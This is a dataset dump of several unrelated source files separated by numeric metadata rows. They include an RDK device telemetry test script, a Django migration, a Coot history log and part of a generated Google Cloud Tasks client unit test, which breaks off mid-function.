tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 5: Set the Telemetry ConfigURL";
print "EXPECTED RESULT 5: Should set the Telemetry ConfigURL";
print "ACTUAL RESULT 5: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
print "***************************************************"
print "Initiating Reboot Please wait till the device comes up";
print"*******************************************************"
obj.initiateReboot();
sleep(300);
tdkTestObj = obj.createTestStep('ExecuteCmd');
cmd= "[ -f /rdklogs/logs/telemetry2_0.txt.0 ] && echo \"File exist\" || echo \"File does not exist\"";
expectedresult="SUCCESS";
tdkTestObj.addParameter("command",cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if details == "File exist" :
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 6: Check for telemetry2_0.txt.0 log file presence";
print "EXPECTED RESULT 6: telemetry2_0.txt.0 log file should be present";
print "ACTUAL RESULT 6: telemetry2_0.txt.0 file is present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep('ExecuteCmd');
cmd = "pidof telemetry2_0";
expectedresult="SUCCESS";
tdkTestObj.addParameter("command",cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if expectedresult in actualresult and details != "":
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 7: Check if telemetry2_0 process is running";
print "EXPECTED RESULT 7:telemetry2_0 process should be running";
print "ACTUAL RESULT 7: pid of telemetry2_0",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 7: Check if telemetry2_0 process is running";
print "EXPECTED RESULT 7:telemetry2_0 process should be running";
print "ACTUAL RESULT78: pid of telemetry2_0",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 6: Check for telemetry2_0.txt.0 log file presence";
print "EXPECTED RESULT 6: telemetry2_0.txt.0 log file should be present";
print "ACTUAL RESULT 6: telemetry2_0.txt.0 file is not present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
#Revert the URL
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL");
tdkTestObj.addParameter("ParamValue",defURL);
tdkTestObj.addParameter("Type","string");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 8: Revert the Telemetry ConfigURL to previous";
print "EXPECTED RESULT 8: Should revert the Telemetry ConfigURL";
print "ACTUAL RESULT 8: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 8: Revert the Telemetry ConfigURL to previous";
print "EXPECTED RESULT 8: Should revert the Telemetry ConfigURL";
print "ACTUAL RESULT 8: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 5: Set the Telemetry ConfigURL";
print "EXPECTED RESULT 5: Should set the Telemetry ConfigURL";
print "ACTUAL RESULT 5: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Get the current Telemetry ConfigURL";
print "EXPECTED RESULT 4: Should get the current Telemetry ConfigURL";
print "ACTUAL RESULT 4: ",defURL;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Get the current Telemetry version in the DUT after Telemetry Enable";
print "EXPECTED RESULT 3: Should get the current Telemetry version in the DUT"
print "ACTUAL RESULT 3: ",telver;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "telemetry was disabled and failed on enabling";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get the Telemetry Enable status";
print "EXPECTED RESULT 1: Should get the Telemetry Enable status";
print "ACTUAL RESULT 1: Telemetry Enable status is:",default
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revertflag ==1:
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable");
tdkTestObj.addParameter("ParamValue",default);
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 9:Revert the telemetry enable status to previous";
print "EXPECTED RESULT 9: Should revert the telemetry enable status to previous";
print "ACTUAL RESULT 9: Revertion was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version")
expectedresult= "SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult and int(details) == 1:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 10:Check if the Telemetry version is 1.0 after disabling Telemetry";
print "EXPECTED RESULT 10: Telemetry version should be 1.0 after disabling Telemetry";
print "ACTUAL RESULT 10:",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 10:Check if the Telemetry version is 1.0 after disabling Telemetry";
print "EXPECTED RESULT 10: Telemetry version should be 1.0 after disabling Telemetry";
print "ACTUAL RESULT 10: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 9:Revert the telemetry enable status to previous";
print "EXPECTED RESULT 9: Should revert the telemetry enable status to previous";
print "ACTUAL RESULT 9: Revertion failed";
print "[TEST EXECUTION RESULT] : FAILURE";
obj1.unloadModule("tdkbtr181");
obj.unloadModule("sysutil");
else:
print "Failed to load module";
obj.setLoadModuleStatus("FAILURE");
obj1.setLoadModuleStatus("FAILURE");
| 52.48468
| 125
| 0.625252
| 1,983
| 18,842
| 5.872416
| 0.140696
| 0.030915
| 0.02061
| 0.024045
| 0.745041
| 0.733705
| 0.720052
| 0.703392
| 0.703392
| 0.682439
| 0
| 0.017012
| 0.279323
| 18,842
| 358
| 126
| 52.631285
| 0.840563
| 0.109012
| 0
| 0.755556
| 0
| 0
| 0.365998
| 0.050475
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013333
| null | null | 0.377778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2af57b653261588b726a18c3bfb5728aee1d403c
| 85
|
py
|
Python
|
mainapp/views/feeds/__init__.py
|
CatoTH/opensourceris
|
3b4b5e4b027a96fd08147fc57b53f078a44a00a7
|
[
"MIT"
] | 1
|
2022-02-17T13:46:03.000Z
|
2022-02-17T13:46:03.000Z
|
mainapp/views/feeds/__init__.py
|
CatoTH/opensourceris
|
3b4b5e4b027a96fd08147fc57b53f078a44a00a7
|
[
"MIT"
] | 13
|
2022-02-11T14:45:36.000Z
|
2022-02-22T19:54:03.000Z
|
mainapp/views/feeds/__init__.py
|
CatoTH/opensourceris
|
3b4b5e4b027a96fd08147fc57b53f078a44a00a7
|
[
"MIT"
] | 1
|
2022-02-17T13:44:17.000Z
|
2022-02-17T13:44:17.000Z
|
from .latest_papers import * # noqa F401
from .search_results import * # noqa F401
| 28.333333
| 42
| 0.741176
| 12
| 85
| 5.083333
| 0.666667
| 0.327869
| 0.459016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0.188235
| 85
| 2
| 43
| 42.5
| 0.797101
| 0.223529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2d5753edc1ae0b301e3006815b0a1ec6d47d7b24
| 1,511
|
py
|
Python
|
great_international/migrations/0086_auto_20190917_0752.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2018-03-20T11:19:07.000Z
|
2021-10-05T07:53:11.000Z
|
great_international/migrations/0086_auto_20190917_0752.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 802
|
2018-02-05T14:16:13.000Z
|
2022-02-10T10:59:21.000Z
|
great_international/migrations/0086_auto_20190917_0752.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2019-01-22T13:19:37.000Z
|
2019-07-01T10:35:26.000Z
|
# Generated by Django 2.2.4 on 2019-09-17 07:52
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('great_international', '0085_auto_20190916_1443'),
]
operations = [
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_ar',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_de',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_en_gb',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_es',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_fr',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_ja',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_pt',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_zh_hans',
),
]
| 30.22
| 59
| 0.614825
| 129
| 1,511
| 6.813953
| 0.333333
| 0.215017
| 0.266212
| 0.307167
| 0.798635
| 0.798635
| 0.798635
| 0.798635
| 0.798635
| 0.798635
| 0
| 0.02919
| 0.297154
| 1,511
| 49
| 60
| 30.836735
| 0.798493
| 0.029782
| 0
| 0.627907
| 1
| 0
| 0.339481
| 0.326503
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9328a19acee4b872a09451f40c8532237d58b7ad
| 2,935
|
py
|
Python
|
data/0-coot-history.py
|
cz-zhao-lab-ibp/edpdb
|
5b0654776409fff26ca1dbd09a5f297c71dc5984
|
[
"Xnet",
"X11"
] | 1
|
2021-06-24T03:33:56.000Z
|
2021-06-24T03:33:56.000Z
|
data/0-coot-history.py
|
cz-zhao-lab-ibp/edpdb
|
5b0654776409fff26ca1dbd09a5f297c71dc5984
|
[
"Xnet",
"X11"
] | null | null | null |
data/0-coot-history.py
|
cz-zhao-lab-ibp/edpdb
|
5b0654776409fff26ca1dbd09a5f297c71dc5984
|
[
"Xnet",
"X11"
] | null | null | null |
filter_fileselection_filenames_state ()
get_active_map_drag_flag ()
use_graphics_interface_state ()
set_display_intro_string ("Good Morning Zhangc, Welcome to Coot.")
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (164963936.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (164963936.00)
set_swap_difference_map_colours (0)
set_active_map_drag_flag (1)
set_idle_function_rotate_angle (164963936.00)
filter_fileselection_filenames_state ()
get_active_map_drag_flag ()
use_graphics_interface_state ()
set_display_intro_string ("Good morning . Welcome to Coot")
set_display_lists_for_maps (0)
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (15334232.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (1028.00)
set_swap_difference_map_colours (0)
set_active_map_drag_flag (1)
set_idle_function_rotate_angle (1028.00)
filter_fileselection_filenames_state ()
get_active_map_drag_flag ()
use_graphics_interface_state ()
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
filter_fileselection_filenames_state ()
handle_read_draw_molecule_with_recentre ("/home/cai/eta/edpdb/data", 1)
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
filter_fileselection_filenames_state ()
filter_fileselection_filenames_state ()
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
;; # DIRECT SCHEME ((smiles-gui))
stereo_mode_state ()
stereo_mode_state ()
stereo_mode_state ()
stereo_mode_state ()
stereo_mode_state ()
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
coot_checked_exit (0)
;; # DIRECT SCHEME ((clear-backups-maybe))
stereo_mode_state ()
save_state ()
| 38.116883
| 71
| 0.853492
| 467
| 2,935
| 4.762313
| 0.173448
| 0.056655
| 0.07554
| 0.125899
| 0.881745
| 0.881745
| 0.881745
| 0.881745
| 0.881745
| 0.881745
| 0
| 0.073091
| 0.063032
| 2,935
| 76
| 72
| 38.618421
| 0.735636
| 0.091993
| 0
| 0.842105
| 0
| 0
| 0.034236
| 0.009029
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
933dba7001d06c35acd08924e702dc9955e12fcb
| 156,631
|
py
|
Python
|
tests/unit/gapic/tasks_v2beta3/test_cloud_tasks.py
|
colincadams/python-tasks
|
e86a80b2623e812775b58950af2f858128b4bb98
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/tasks_v2beta3/test_cloud_tasks.py
|
colincadams/python-tasks
|
e86a80b2623e812775b58950af2f858128b4bb98
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/tasks_v2beta3/test_cloud_tasks.py
|
colincadams/python-tasks
|
e86a80b2623e812775b58950af2f858128b4bb98
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google import auth
from google.api_core import client_options
from google.api_core import exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.auth import credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.tasks_v2beta3.services.cloud_tasks import CloudTasksAsyncClient
from google.cloud.tasks_v2beta3.services.cloud_tasks import CloudTasksClient
from google.cloud.tasks_v2beta3.services.cloud_tasks import pagers
from google.cloud.tasks_v2beta3.services.cloud_tasks import transports
from google.cloud.tasks_v2beta3.types import cloudtasks
from google.cloud.tasks_v2beta3.types import queue
from google.cloud.tasks_v2beta3.types import queue as gct_queue
from google.cloud.tasks_v2beta3.types import target
from google.cloud.tasks_v2beta3.types import task
from google.cloud.tasks_v2beta3.types import task as gct_task
from google.iam.v1 import iam_policy_pb2 as iam_policy # type: ignore
from google.iam.v1 import options_pb2 as options # type: ignore
from google.iam.v1 import policy_pb2 as policy # type: ignore
from google.oauth2 import service_account
from google.protobuf import any_pb2 as any # type: ignore
from google.protobuf import duration_pb2 as duration # type: ignore
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
from google.protobuf import timestamp_pb2 as timestamp # type: ignore
from google.rpc import status_pb2 as status # type: ignore
from google.type import expr_pb2 as expr # type: ignore
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert CloudTasksClient._get_default_mtls_endpoint(None) is None
assert (
CloudTasksClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert CloudTasksClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient])
def test_cloud_tasks_client_from_service_account_file(client_class):
creds = credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client._transport._credentials == creds
client = client_class.from_service_account_json("dummy/file/path.json")
assert client._transport._credentials == creds
assert client._transport._host == "cloudtasks.googleapis.com:443"
def test_cloud_tasks_client_get_transport_class():
transport = CloudTasksClient.get_transport_class()
assert transport == transports.CloudTasksGrpcTransport
transport = CloudTasksClient.get_transport_class("grpc")
assert transport == transports.CloudTasksGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
def test_cloud_tasks_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
transport = transport_class(credentials=credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
api_mtls_endpoint="squid.clam.whelk",
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", and client_cert_source is provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "auto"}):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=client_cert_source_callback,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", and default_client_cert_source is provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "auto"}):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", but client_cert_source and default_client_cert_source are None.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "auto"}):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_cloud_tasks_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_cloud_tasks_client_client_options_credentials_file(
client_class, transport_class, transport_name
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_cloud_tasks_client_client_options_from_dict():
with mock.patch(
"google.cloud.tasks_v2beta3.services.cloud_tasks.transports.CloudTasksGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = CloudTasksClient(client_options={"api_endpoint": "squid.clam.whelk"})
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
api_mtls_endpoint="squid.clam.whelk",
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_list_queues(
transport: str = "grpc", request_type=cloudtasks.ListQueuesRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse(
next_page_token="next_page_token_value",
)
response = client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesPager)
assert response.next_page_token == "next_page_token_value"
def test_list_queues_from_dict():
test_list_queues(request_type=dict)
@pytest.mark.asyncio
async def test_list_queues_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.ListQueuesRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse(next_page_token="next_page_token_value",)
)
response = await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesAsyncPager)
assert response.next_page_token == "next_page_token_value"
def test_list_queues_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
